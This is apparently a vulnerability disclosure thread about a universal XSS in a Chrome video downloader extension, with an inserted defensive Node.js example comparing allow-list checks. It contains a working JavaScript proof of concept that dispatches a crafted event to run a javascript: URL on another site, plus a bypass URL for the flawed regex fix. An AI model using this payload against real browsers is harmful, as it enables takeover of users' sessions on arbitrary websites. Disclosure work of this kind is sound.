Issue metadata

Status: Fixed
Closed: Apr 5

Video Downloader Extension: Universal XSS

Project Member Reported by taviso@google.com, Mar 28

Issue description

Browsing through the list of most popular Chrome extensions, I noticed this extension with 4M users:

https://chrome.google.com/webstore/detail/video-downloader-professi/elicpjhcidhpjomhibiffojpinpmmpil?hl=en

It has a pretty obvious universal XSS (i.e. it effectively lets any site take over any other site).

Any website can do this:

// Change the active tab
window.open("https://google.com");

// Run code in the new tab
setTimeout('document.dispatchEvent(new CustomEvent("link64_msgAddLinks", {detail: {type: "__L64_NAVIGATE_CHROME_URL", url: "javascript:alert(document.title);window.close()"}}))', 1000);

That will run arbitrary code on google.com.

I reported this bug to the cws team.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member

Comment 1 by taviso@google.com, Mar 29

The cws has disabled new installs and notified the developer.

I noticed this doesn't work on Firefox; it turns out they block navigations to javascript URLs.

https://dxr.mozilla.org/mozilla-central/source/toolkit/components/extensions/ExtensionUtils.jsm#631

I think we should do that too, so I filed a chrome bug.

https://bugs.chromium.org/p/chromium/issues/detail?id=827288
Project Member

Comment 2 by taviso@google.com, Mar 29

There was a clone of the extension with another 1 million users here:

https://chrome.google.com/webstore/detail/video-downloader-professi/kmdldgcmokdpmacblnehppgkjphcbpnn

I notified the CWS team (grrrr).
Project Member

Comment 3 by taviso@google.com, Apr 4

The author uploaded a new version, but the fix is not good enough. The fix was to only allow the events on websites that match a complicated RegEx.


    if (!document.location.href.match(new RegExp("(https?://)?(www\\.)?(yotu\\.be/|youtube\\.com/)?((.+/)?(watch(\\?v=|.+&v=))?(v=)?)([\\w_-]{11})(&.+)?"))) {
        return;
    }



1. The regex is not anchored, and too many components are optional, so any website can use it.

Example: http://www.example.com/#watch?v=AAAAAAAAAAA matches the RegEx.

> "http://www.example.com/#watch?v=AAAAAAAAAAA".match(new RegExp("(https?://)?(www\\.)?(yotu\\.be/|youtube\\.com/)?((.+/)?(watch(\\?v=|.+&v=))?(v=)?)([\\w_-]{11})(&.+)?"))
(11) ["watch?v=AAAAAAAAAAA", ...]

2. Even if it was anchored and fewer components were optional, it allows http, so all users with this extension basically have no ssl.

I suggested the author verify document.location.protocol is https, and then check document.location.hostname.endsWith(".youtube.com"), avoiding RegEx if possible.

For example:

if (document.location.protocol != "https:" || !document.location.hostname.endsWith(".youtube.com"))
    return; // Not Allowed

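Added example, not code from the bug report or from the extension: it puts the author's first, regex-based allow-list from comment 3 side by side with the anchored protocol/hostname check suggested in the same comment, and adds the scheme filter that comment 1 describes Firefox applying to extension-initiated navigations. It runs under Node.js, with the WHATWG URL class standing in for document.location so the checks can be exercised offline; the function names and the sample URLs are mine.

```javascript
// Added example (not the extension's code). Compares the unanchored regex
// allow-list quoted in comment 3 with a hostname-based check, and shows a
// scheme allow-list for navigation targets of the kind comment 1 refers to.

// The pattern quoted verbatim from comment 3. Nothing is anchored and nearly
// every group is optional, so the engine only has to find 11 consecutive
// [\w_-] characters somewhere in the string.
const WEAK_ALLOW_RE = new RegExp(
  "(https?://)?(www\\.)?(yotu\\.be/|youtube\\.com/)?" +
  "((.+/)?(watch(\\?v=|.+&v=))?(v=)?)([\\w_-]{11})(&.+)?"
);

function passesWeakRegex(href) {
  return WEAK_ALLOW_RE.test(href);
}

// The hardened origin check from comment 3: require https and a hostname
// under youtube.com, compared on the parsed hostname rather than by searching
// the whole URL string, so path, query and fragment content cannot influence
// the result.
function passesHardenedCheck(href) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return false; // unparseable input is rejected, never matched
  }
  if (url.protocol !== "https:") return false;
  // endsWith(".youtube.com") as suggested in the report: accepts
  // www.youtube.com, rejects youtube.com.evil.example and notyoutube.com
  // (and, as written, the bare apex youtube.com).
  return url.hostname.endsWith(".youtube.com");
}

// Scheme allow-list for a navigation target received from page content,
// mirroring the Firefox behaviour referenced in comment 1: only http(s)
// targets are honoured, so a javascript: URL never reaches the tab.
function isSafeNavigationTarget(href) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return false;
  }
  return url.protocol === "http:" || url.protocol === "https:";
}

// Constructed sample inputs: the example.com URL from comment 3, a real
// YouTube watch URL over https and over http, a lookalike host, and a
// javascript: URL of the shape used in the report.
const SAMPLE_URLS = [
  "http://www.example.com/#watch?v=AAAAAAAAAAA",
  "https://www.youtube.com/watch?v=AAAAAAAAAAA",
  "http://www.youtube.com/watch?v=AAAAAAAAAAA",
  "https://www.youtube.com.evil.example/watch?v=AAAAAAAAAAA",
  "javascript:alert(document.title)",
];

// Runs all three checks over a list of URLs and returns one row per URL.
function evaluateAll(urls) {
  return urls.map((href) => ({
    href,
    weakRegex: passesWeakRegex(href),
    hardened: passesHardenedCheck(href),
    safeTarget: isSafeNavigationTarget(href),
  }));
}

console.table(evaluateAll(SAMPLE_URLS));
```

The table makes the two findings in comment 3 visible at once: the example.com URL passes the regex but fails the hostname check, and the http YouTube URL passes the regex but is rejected because the protocol is not https. The scheme filter is independent of the origin check; even a page that legitimately passes the origin check should not be able to hand the extension a javascript: target.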
Project Member

Comment 4 by taviso@google.com, Apr 5

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
The author pushed a version with a good quality fix, and the cws team have reinstated the extension. Fixed in < 7 days!
